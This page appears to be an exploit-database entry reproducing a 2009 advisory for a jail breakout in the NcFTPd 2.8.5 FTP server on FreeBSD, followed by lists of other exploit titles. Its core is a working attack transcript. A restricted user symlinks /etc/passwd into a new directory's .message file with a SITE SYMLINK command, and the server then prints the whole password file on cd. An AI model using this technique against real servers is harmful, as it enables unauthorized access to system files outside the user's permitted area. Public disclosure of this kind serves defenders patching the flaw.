Menu

Search for hundreds of thousands of exploits

"NcFTPd 2.8.5 - Remote Jail Breakout"

Author

Exploit author

kingcope

Platform

Exploit platform

freebsd

Release date

Exploit published date

2009-07-27

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
NcFTPd <= 2.8.5 remote jail breakout

Discovered by:
	Kingcope
	Contact: kcope2<at>googlemail.com / http://isowarez.de

Date:
	27th July 2009

Greetings:
	Alex,Andi,Adize,wY!,Netspy,Revoguard

Prerequisites:
	Valid user account.
	
Demonstration on FreeBSD 7.0-RELEASE and NcFTPd 2.8.5 (latest version):

# ftp 192.168.2.5
Connected to 192.168.2.5.
220 localhost NcFTPd Server (unregistered copy) ready.
Name (192.168.2.5:root): kcope
331 User kcope okay, need password.
Password:
230-You are user #1 of 50 simultaneous users allowed.
230-
230 Restricted user logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> get /etc/passwd passwd
local: passwd remote: /etc/passwd
502 Unimplemented command.
227 Entering Passive Mode (192,168,2,5,219,171)
550 No such file.
ftp> ls ..
227 Entering Passive Mode (192,168,2,5,218,102)
553 Permission denied.
ftp> mkdir isowarez
257 "/isowarez" directory created.
ftp> quote site symlink /etc/passwd isowarez/.message
250 Symlinked.
ftp> cd isowarez
250-"/isowarez" is new cwd.
250-
250-# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $
250-#
250-root:*:0:0:Charlie &:/root:/bin/sh
250-toor:*:0:0:Bourne-again Superuser:/root:
250-daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
250-operator:*:2:5:System &:/:/usr/sbin/nologin
250-bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
250-tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
250-kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
250-games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
250-news:*:8:8:News Subsystem:/:/usr/sbin/nologin
250-man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
250-sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
250-smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
250-mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
250-bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
250-proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
250-_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
250-_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
250-uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
250-pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
250-www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
250-nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
250-kcope:*:1001:1001:User kcope:/home/kcope:/bin/csh
250-messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/sbin/nologin
250-polkit:*:562:562:PolicyKit Daemon User:/nonexistent:/sbin/nologin
250-haldaemon:*:560:560:HAL Daemon User:/nonexistent:/sbin/nologin
250-ftp:*:1002:14:User &:/home/ftp:/bin/sh
250-cyrus:*:60:60:the cyrus mail server:/usr/local/cyrus:/bin/csh
250-postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin
250-test:*:1003:1003:test:/home/test:/bin/sh
250-+testx:*:::::/bin/sh
250
ftp>

+on freebsd you can symlink directories like ´/´

Cheerio,

Kingcope

# milw0rm.com [2009-07-27]
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-04-06 "pfSense 2.4.4-P3 - 'User Manager' Persistent Cross-Site Scripting" webapps freebsd "Matthew Aberegg"
2020-02-11 "OpenSMTPD 6.4.0 < 6.6.1 - Local Privilege Escalation + Remote Code Execution" remote freebsd "Marco Ivaldi"
2019-12-30 "FreeBSD-SA-19:15.mqueuefs - Privilege Escalation" local freebsd "Karsten König"
2019-12-30 "FreeBSD-SA-19:02.fd - Privilege Escalation" local freebsd "Karsten König"
2019-07-10 "FreeBSD 12.0 - 'fd' Local Privilege Escalation" local freebsd gr4yf0x
2016-01-25 "FreeBSD SCTP ICMPv6 - Error Processing" dos freebsd ptsecurity
2015-01-29 "FreeBSD - Multiple Vulnerabilities" dos freebsd "Core Security"
2013-10-04 "FreeBSD 9.0 - Intel SYSRET Kernel Privilege Escalation" local freebsd CurcolHekerLink
2013-06-26 "FreeBSD 9 - Address Space Manipulation Privilege Escalation (Metasploit)" local freebsd Metasploit
2013-06-21 "FreeBSD 9.0 < 9.1 - 'mmap/ptrace' Local Privilege Escalation" local freebsd Hunger
Release Date Title Type Platform Author
2013-10-29 "Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Remote Code Execution" remote php kingcope
2013-09-03 "MikroTik RouterOS - sshd (ROSSSH) Remote Heap Corruption" remote hardware kingcope
2013-08-07 "Apache suEXEC - Information Disclosure / Privilege Escalation" remote linux kingcope
2013-07-16 "Squid 3.3.5 - Denial of Service (PoC)" dos linux kingcope
2013-07-11 "Nginx 1.3.9/1.4.0 (x86) - Brute Force" remote linux_x86 kingcope
2013-06-05 "Plesk < 9.5.4 - Remote Command Execution" remote php kingcope
2013-04-12 "ircd-hybrid 8.0.5 - Denial of Service" dos linux kingcope
2012-12-06 "Oracle MySQL / MariaDB - Insecure Salt Generation Security Bypass" remote linux kingcope
2012-12-02 "MySQL (Linux) - Stack Buffer Overrun (PoC)" dos linux kingcope
2012-12-02 "MySQL (Linux) - Heap Overrun (PoC)" dos linux kingcope
2012-12-02 "MySQL - 'Stuxnet Technique' Windows Remote System" remote windows kingcope
2012-12-02 "MySQL (Linux) - Database Privilege Escalation" local linux kingcope
2012-12-02 "MySQL 5.1/5.5 (Windows) - 'MySQLJackpot' Remote Command Execution" remote windows kingcope
2012-12-02 "IBM System Director Agent - Remote System Level" remote windows kingcope
2012-12-02 "freeSSHd 2.1.3 - Remote Authentication Bypass" remote windows kingcope
2012-12-02 "MySQL - Remote User Enumeration" remote multiple kingcope
2012-12-02 "(SSH.com Communications) SSH Tectia (SSH < 2.0-6.1.9.95 / Tectia 6.1.9.95) - Remote Authentication Bypass" remote linux kingcope
2012-12-02 "freeFTPd 1.2.6 - Remote Authentication Bypass" remote windows kingcope
2012-12-02 "MySQL - Denial of Service (PoC)" dos linux kingcope
2012-08-13 "Pure-FTPd 1.0.21 (CentOS 6.2 / Ubuntu 8.04) - Null Pointer Dereference Crash (PoC)" dos linux kingcope
2012-07-01 "BSD - 'TelnetD' Remote Command Execution (2)" remote bsd kingcope
2012-06-10 "Microsoft IIS 6.0/7.5 (+ PHP) - Multiple Vulnerabilities" remote windows kingcope
2012-03-19 "Apache Tomcat - Account Scanner / 'PUT' Request Command Execution" remote multiple kingcope
2012-01-17 "Linux Kernel 2.6.36 IGMP - Remote Denial of Service" dos linux kingcope
2011-12-01 "Serv-U FTP Server - Jail Break" remote windows kingcope
2011-12-01 "FreeBSD - 'ftpd / ProFTPd' Remote Command Execution" remote freebsd kingcope
2011-10-11 "JBoss AS 2.0 - Remote Command Execution" remote windows kingcope
2011-08-19 "Apache - Remote Memory Exhaustion (Denial of Service)" dos multiple kingcope
2011-06-30 "FreeBSD OpenSSH 3.5p1 - Remote Command Execution" remote freebsd kingcope
2011-03-04 "JBoss Application Server 4.2 < 4.2.0.CP09 / 4.3 < 4.3.0.CP08 - Remote Command Execution" webapps jsp kingcope 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected